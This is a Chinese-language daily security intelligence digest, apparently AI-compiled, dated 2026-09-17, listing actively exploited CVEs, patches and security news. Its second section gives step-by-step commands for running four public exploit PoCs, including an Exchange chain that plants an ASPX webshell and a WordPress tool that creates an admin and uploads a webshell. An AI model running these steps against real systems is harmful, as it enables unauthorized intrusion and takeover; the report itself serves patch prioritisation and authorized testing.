每日安全情报报告 · 2026-09-17

每日安全情报报告

由 AI 整理发布

覆盖近 48 小时新增高危漏洞、公开 PoC 与安全情报文章(数据截至 2026-09-17)

风险等级:🔴 严重 | 🟠 高危 | 🟡 中危 | 🟢 低危


一、最新高危漏洞

本期重点:CISA 于 2026-09-16 一次性将 3 枚在野漏洞纳入 KEV 目录(Cisco ISE、Acronis Backup、Google Pixel),均设 2026-09-19 为联邦修复截止日,建议所有组织优先处置。

🔴 严重 · 近 24--48 小时新增 / 在野利用

1. CVE-2026-76460 --- Cisco ISE / ISE-PIC 认证绕过(CVSS 10.0)
  • 漏洞类型:API 权限滥用 / 认证绕过(CWE-648)
  • 受影响组件:Cisco Identity Services Engine (ISE) 3.1--3.5 各补丁版本、Cisco ISE Passive Identity Connector (ISE-PIC) 3.4.0 / 3.5.0
  • CVSSAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0
  • 在野状态 :✅ CISA KEV 于 2026-09-16 收录,截止 2026-09-19;Cisco 称源于 TAC 工单中发现的真实入侵,成功利用可获 root 命令执行
  • 修复版本:ISE 3.1→Patch 12 / 3.2→Patch 11 / 3.3→Patch 12 / 3.4→Patch 7 / 3.5→Patch 4
  • 链接NVD 详情 · CISA KEV 记录 · Cisco 官方公告
2. CVE-2026-87886 --- Acronis Backup(cPanel/WHM & Plesk)本地提权(CVSS 7.8)
  • 漏洞类型:默认权限不当(CWE-276)本地权限提升
  • 受影响组件:Acronis Backup plugin for cPanel & WHM(Linux,build < 1.9.3.1021)、Acronis Backup extension for Plesk(Linux,build < 1.8.11.638)
  • CVSSAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H = 7.8
  • 在野状态 :✅ CISA KEV 2026-09-16 收录,截止 2026-09-19;Acronis 确认 cPanel/WHM 部署遭有限定向攻击
  • 修复版本:cPanel/WHM → 1.9.3 HF3(build 1.9.3.1021);Plesk → 1.8.11(build 1.8.11.638)
  • 链接NVD 详情 · CISA KEV 记录 · Acronis 安全公告 SEC-10986
3. CVE-2026-58704 --- Google Pixel 蜂窝基带不当授权提权
  • 漏洞类型:权限检查绕过 / 不当授权(CWE 权限提升)
  • 受影响组件:Google Pixel 系列(含受影响调制解调器固件版本)
  • CVSS:厂商未公开具体分值(高危)
  • 在野状态 :✅ CISA KEV 2026-09-16 收录;需升级至已修复的 Pixel 固件/安全补丁级别
  • 链接NVD 详情 · CISA KEV 记录
4. CVE-2026-76461 --- Cisco Secure Email Gateway (SEG) SQL 注入 → root RCE
  • 漏洞类型:SQL 注入(未授权远程命令执行,root)
  • 受影响组件:Cisco AsyncOS for Cisco Secure Email Gateway(SEG)
  • CVSS :高危(CISA KEV 2026-09-14 收录)
  • 在野状态:✅ 已被在野利用;攻击者可在底层系统以 root 权限执行任意命令
  • 链接NVD 详情 · CISA KEV 记录

🔴 严重 · 仍在野存量(持续告警,优先处置)

5. CVE-2026-81963 / CVE-2026-85880 --- 微软 9 月补丁日两枚在野零日(CVSS 7.8)
  • 漏洞类型:Windows Update Stack 链接跟随提权(CVE-2026-81963)/ Windows ALPC 堆溢出提权(CVE-2026-85880)
  • 受影响组件:Windows 10 / 11 / Server 2019 / 2022 / 2025 全受支持版本
  • CVSS :均 7.8(本地提权至 SYSTEM)
  • 在野状态 :✅ CISA KEV 2026-09-08 收录,截止 2026-09-22;9 月补丁日创纪录修复 974 个 CVE(含 2 个 0day、20+ 可蠕虫化漏洞)
  • 链接CVE-2026-81963 NVD · CVE-2026-85880 NVD · CISA KEV 记录 · CERT.UG 分析
6. CVE-2026-85706 --- GitLab 路径穿越任意文件读(CVSS 10.0)
  • 漏洞类型:路径穿越(未授权任意文件读取)
  • 受影响组件:GitLab CE/EE(特定受影响版本)
  • CVSS10.0
  • 在野状态 :✅ CISA KEV 2026-09-11 收录,截止 2026-09-14;已遭真实利用窃取配置文件与 SSH 密钥
  • 链接NVD 详情 · CISA KEV 记录
7. CVE-2026-75650 --- Adobe Commerce / Magento「StyleSmuggler」未授权 RCE(CVSS 10.0)
  • 漏洞类型:模板引擎特殊元素处理不当(PHP 代码注入,未授权 RCE)
  • 受影响组件:Adobe Commerce、Magento Open Source、B2B
  • CVSS10.0
  • 在野状态:✅ 自 2026-09-04 起在野;部署 Rust 后门 + PHP WebShell;KEV 截止 09-11
  • 链接NVD 详情 · TheHackerNews 报道

🟠 高危 · 近期公开 PoC / 高关注

CVE 类型 受影响组件 CVSS 状态 链接
CVE-2026-62911 Exchange 认证绕过 → SYSTEM RCE Microsoft Exchange 2016/2019/SE 8.0/8.1 公开 PoC,约 21,899 台暴露 NVD · MSRC
CVE-2026-75604 Next.js Windows 未授权 RCE Next.js ≥13.4 <15.5.24 / ≥16.0 <16.3.3(Windows) 高危 公开 PoC NVD · Next.js 公告
CVE-2026-82329 JFrog Artifactory 未授权管理员 JFrog Artifactory 9.8 KEV 09-02 NVD · KEV
CVE-2026-84869 ConnectWise ScreenConnect 会话内任意代码执行 ConnectWise ScreenConnect 9.9 KEV 09-12 NVD · KEV
CVE-2026-67277 / CVE-2026-86060 MikroTik RouterOS「MikroTrick」无认证接管 MikroTik RouterOS 8.8 / 9.2 KEV 09-10 NVD · KEV
CVE-2026-20079 Cisco FMC 认证绕过 → root Cisco Secure Firewall FMC 10.0 KEV 09-04 NVD · THN
CVE-2026-19490 Citrix NetScaler SAML 认证绕过 NetScaler ADC / Gateway 9.3 KEV 09-04 NVD · THN

二、最新漏洞 PoC(含使用步骤)

⚠️ 以下 PoC 仅供授权安全测试与研究使用,运行前务必审阅代码、在隔离环境验证。

PoC 1 · CVE-2026-62911 --- Microsoft Exchange 预认证 RCE(Pwn2Own Berlin 2026 三漏洞链)

  • 来源hypnguyen1209/CVE-2026-62911
  • 原理 :滥用 MRSProxy 在 HTTP.sys 上缺少 EPA 保护的端点,通过 PetitPotam(MS-EFSR) 中继机器账户 NTLM,利用 IMailbox_Config6 任意路径写入 ASPX WebShell,获 SYSTEM。
  • 使用步骤
    bash git clone https://github.com/hypnguyen1209/CVE-2026-62911.git cd CVE-2026-62911 pip install impacket pysocks # 仅检测 MRSProxy 是否暴露(无需凭据) python3 exploit.py --check-only -t 192.168.1.10 -e 192.168.1.11 -l 192.168.1.100 # 完整利用(-t 触发机 -e 目标机 -l 监听机) python3 exploit.py -t 192.168.1.10 -e 192.168.1.11 -l 192.168.1.100 # 验证 WebShell 落地 curl -sk "https://192.168.1.10/aspnet_client/system_web/shell.aspx?cmd=whoami+/all"
  • 参考ZDI Pwn2Own Berlin 2026 Day 2 · MBBank VRED 分析

PoC 2 · CVE-2026-20817 --- Windows Error Reporting (WER) ALPC 本地提权

  • 来源oxfemale/CVE-2026-20817
  • 原理 :WER 服务 SvcElevatedLaunch(0x0D) 未校验调用者权限,通过共享内存注入命令行,以 SYSTEM 启动 WerFault.exe
  • 使用步骤
    bash git clone https://github.com/oxfemale/CVE-2026-20817.git cd CVE-2026-20817 # 使用 Visual Studio 开发者命令提示符编译 cl /EHsc CVE-2026-20817_PoC.cpp # 在低权限账户下运行,验证提权至 SYSTEM CVE-2026-20817_PoC.exe
  • 说明:该漏洞已于 2026 年 1 月补丁修复;受影响系统为未打 1 月补丁的 Win10/11/Server 2019/2022。

PoC 3 · CVE-2026-75604 --- Next.js(Windows)未授权 RCE

  • 来源rafabd1/CVE-2026-75604-poc
  • 原理:Windows 平台同时启用 Pages Router 与 App Router(无 Cache Components)的 Next.js 应用,通过缓存路径构造实现未授权远程命令执行。
  • 使用步骤
    bash git clone https://github.com/rafabd1/CVE-2026-75604-poc.git cd CVE-2026-75604-poc python -m pip install -r requirements.txt # 对目标发起利用(回调地址需目标可达) python poc.py --target http://TARGET:3000 \ --callback-ip CALLBACK_IP \ --pages-cache-path /pages-cache/seed \ --app-cache-path /app-cache/seed
  • 受影响版本 :Next.js >=13.4 <15.5.24>=16.0 <16.3.3(需原生 Windows 部署)。
  • 参考Next.js 安全公告 GHSA-p293-qw3h-jr36

PoC 4 · wp2shell --- CVE-2026-63030 + CVE-2026-60137(WordPress 核心未授权 RCE)

  • 来源0xsha/wp2shell
  • 原理 :CVE-2026-63030(REST 批量路由混淆)绕过类型校验,触发 CVE-2026-60137(WP_Query SQL 注入),实现「未登录 → 创建管理员 → 植入 WebShell」全链。
  • 使用步骤
    bash git clone https://github.com/0xsha/wp2shell.git cd wp2shell # 仅标准库,无需第三方依赖;Python 3.7+ # 非破坏性检测 ./wp2shell.py check https://target # 执行 RCE(自动创建管理员并上传 WebShell) ./wp2shell.py shell https://target --cmd id # 批量扫描 ./wp2shell.py scan https://target --prove
  • 参考wp2shell README

三、网络安全最新文章

  1. Google 发布 Chrome 153 安全更新,修复 42 个漏洞含 3 个严重级

    摘要:Chrome 153 修复 42 个漏洞,其中 3 个严重级(CVE-2026-91726 WebGL 越界读取、CVE-2026-91721 Internals UAF、CVE-2026-91749 Workers UAF),建议用户与企业尽快更新。

    来源:阅读原文(FreeBuf)

  2. 全球网络安全速递:微软 974 个漏洞补丁反致故障,紧急补救

    摘要:微软 9 月补丁日修复 974 个 CVE 创纪录,却引发 RDS、Hyper-V、USB 音频故障并发布带外紧急更新;GitLab 满分漏洞 CVE-2026-85706 已被在野利用,月费 250 美元的 VectraRAT 浮现,疑似朝鲜 APT 借 HAProxy 后门攻击韩国媒体与汽车业。

    来源:阅读原文(CN-SEC)

  3. FreeBuf 周报:首个利用微信通话实现「0 交互入侵」的蠕虫 WeWorm 出现;DeepSeek Harness 曝高危漏洞

    摘要:WeWorm 经微信通话跨 iOS/Android 传播、无需接听数秒接管账号(腾讯已修复);DeepSeek Harness 高危漏洞可让 Agent 关闭文件沙箱、绕过批准;另含微软 974 CVE 补丁、ChatGPT 沙箱跨账户窃密等热点。

    来源:阅读原文(FreeBuf)

  4. CISA 将 Cisco、Citrix、Fortinet 在野漏洞纳入 KEV,设 9/12 联邦修复截止

    摘要:Cisco FMC 认证绕过(CVE-2026-20079,CVSS 10.0,已确认 3 个威胁集群利用)、Citrix NetScaler SAML 绕过(CVE-2026-19490,CVSS 9.3)、Fortinet FortiOS 堆溢出(CVE-2025-25249)遭在野利用,其中 FortiOS 被用于将 PivotC2 RAT 投放至 178 台设备。

    来源:阅读原文(TheHackerNews)

  5. N-able N-central 预认证 RCE(CVE-2026-86218,CVSS 10.0)已被在野利用

    摘要:CISA 将 N-able N-central 静态代码注入漏洞纳入 KEV(截止 9/11),watchTowr 已复现;可串联 CVE-2026-86206/86207 绕过认证创建管理员账户。

    来源:阅读原文(TheHackerNews)

  6. Adobe 修复 Magento 零日「StyleSmuggler」(CVE-2026-75650,CVSS 10.0)

    摘要:Adobe Commerce / Magento 模板引擎注入导致未授权 RCE,自 9/4 起在野,部署 Rust 后门与 PHP WebShell;蜜罐记录到中、罗两国 IP 利用尝试。

    来源:阅读原文(TheHackerNews)


部分内容由 AI 辅助生成

相关推荐
2601_966377134 小时前
176号令10月1日施行|网安检查换新规矩,数达数安版等保一体机方案助企业从容应对
网络安全·数据安全·数安版等保一体机
qingtian!6 小时前
VM中安装WinServer2016详细教程
网络安全
罗斯8396 小时前
EMBER恶意软件基准数据集
人工智能·算法·安全·网络安全
恣睢s7 小时前
MISC杂项——Base加密加密
网络安全
黄金龙PLUS7 小时前
5个800比特大状态置换算法的设计与分析
算法·网络安全·密码学·哈希算法·同态加密
sbjdhjd8 小时前
从日志包含到临时文件竞争:文件包含进阶复盘中的 Docker、Windows 与 Session 限制
网络·安全·web安全·网络安全·数据挖掘·php·rce
白猫不黑8 小时前
网络安全面试题大全:22道高频题附解析与答案
web安全·计算机·网络安全·信息安全·渗透测试·编程·面试题
白猫不黑9 小时前
网络安全和信息安全的区别:全方位解析与学习路径
计算机·网络安全·黑客·信息安全·程序员·渗透测试·编程
白猫不黑9 小时前
零基础如何学习网络安全:从入门到实战的完整路线图
web安全·计算机·网络安全·黑客·信息安全·渗透测试·代码审计